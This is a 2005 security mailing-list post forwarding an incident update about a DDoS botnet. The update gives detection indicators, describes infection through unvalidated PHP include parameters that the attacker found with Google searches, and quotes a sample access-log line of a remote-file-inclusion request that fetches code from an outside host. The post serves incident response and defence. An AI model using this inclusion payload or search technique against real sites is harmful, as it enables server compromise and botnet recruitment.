[Dshield] [Fwd: Re:Destructive botnet originating from Japan]
cbrenton at chrisbrenton.org
Sat Dec 24 22:00:26 GMT 2005
The plot thickens...
-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Sat, 24 Dec 2005 10:44:10 -0800
> Here is a little update:
> As of last night authorities were able to seize the IRC server from
> the ISP in Japan and there will be extensive follow-up it. The DDoS
> attack is now running headless in the happy range of about 3+ Gbps at
> around 7-9M PPS. The bots will continue attacking us until they
> receive the stop command from the bot master, there will never be a
> stop command, so we will continue to see packet love for a few months
> while people find that they are attacking us. We will publish a new
> list of the bots on Monday as we idle with this low traffic rate over
> the weekend.
> The attacker was targeting a couple customers that came into our
> environment after other solutions failed to work for them. After
> reviewing and comparing notes, it is obvious that the attacks were
> assassination attempts from a competitor. There was no extortion
> If you want to get the bots off your network, watch flow data
> destined to AS32787 with SYN floods to TCP 80 as the destination.
> Sites that use a PHP include (without validating the strings) to pull-
> up different web sections and pages are at risk, a lot of people are
> reporting infection via "$section.php" and "$page.php", the attacker
> appears to have used Google to locate sites that use includes in that
> fashion (searching "index.php?page=" or "index.php?section=").
> Reviewing infected machines for logs related to 18.104.22.168 would be
> easy to locate a past infection but may not be reliable if the
> attacker starts a new botnet. An example of the log data looks
> something like this:
> grep 22.214.171.124 access_log
> 126.96.36.199 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?
> section=http%3A//188.8.131.52/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
> Happy hunting and have nice holidays!
> Barrett Lyon
> CTO and founder
> Prolexic Technologies, Inc
More information about the list